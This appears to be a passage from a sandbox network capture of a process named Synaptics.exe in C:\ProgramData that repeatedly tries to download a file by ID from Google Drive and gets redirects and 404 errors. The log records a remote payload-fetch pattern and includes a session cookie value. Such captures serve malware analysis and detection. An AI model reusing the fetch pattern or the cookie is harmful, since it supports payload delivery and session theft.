                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:52 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-zlm4UgkhaA9witfbkbXu3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:53 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:53 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="WcMdG3StN37JVoGzhP0aFA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:53 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      78 | 192.168.2.11 | 50032 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:52 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:53 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC4A-q_zcd39YnCJK9hh-oQ6O3WyIzEb1YAUJfO3G1LxG1Pvi5hVgthcae9tC_ye0wyV
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:52 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ILeC2Zcb0O5J7GMk2B98dA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:53 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                      2024-12-30 10:25:53 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="OMFYDgOVD398W6jdJ_68bA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:53 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      79 | 192.168.2.11 | 50041 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:53 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:53 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:53 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-krCWGv6urShK2bKY6LflEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      80 | 192.168.2.11 | 50043 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:53 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:53 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:53 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ymSie-u_zU56VbKMQjhfkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      81 | 192.168.2.11 | 50044 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:53 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:54 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6XEe4RhX42xTNE9domJU0eLuYzfZ78rmXMLbZ-pedMBBgSfR2uPjZdEOBmqrqmmisnoIe0BcM
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:54 GMT
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-9nlj1GBjXGNUvF09q5Whrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:54 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:54 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="GGPwqwwZOIQToZLXA5Q0OQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:54 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      82 | 192.168.2.11 | 50045 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:53 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:54 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC5_OJ-cVcgChkWmhLs4YNM-FVDAL4T9Hwj9hiZ-wYt6jO65Ihr3vg4-vDKOiL9-N8RR
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:53 GMT
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-aDqmbB-n_XGalbm7iEHvIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:54 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                      2024-12-30 10:25:54 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="-bJh4oQuKQtz3Y1P0eYJgw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:54 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      83 | 192.168.2.11 | 50053 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:54 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:54 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:54 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-RJnQ6F2ZXjaV8d3m0EGMWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      84 | 192.168.2.11 | 50054 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:54 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      85 | 192.168.2.11 | 50056 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:54 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      86 | 192.168.2.11 | 50057 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:54 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:55 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC55eM4_g_1BO9gnK_9XU3zuySkRUKuSNUhhZhV_tutUfozkP09_FIIy7gjFE59tdkaYqzJtzgo
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:55 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-MZOnETiskmyBT6f1Wr70Xg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:55 UTC | 140 | IN
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:55 UTC | 1390 | IN
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="ipjEpqhVXqYULv9YDQow4Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:55 UTC | 122 | IN
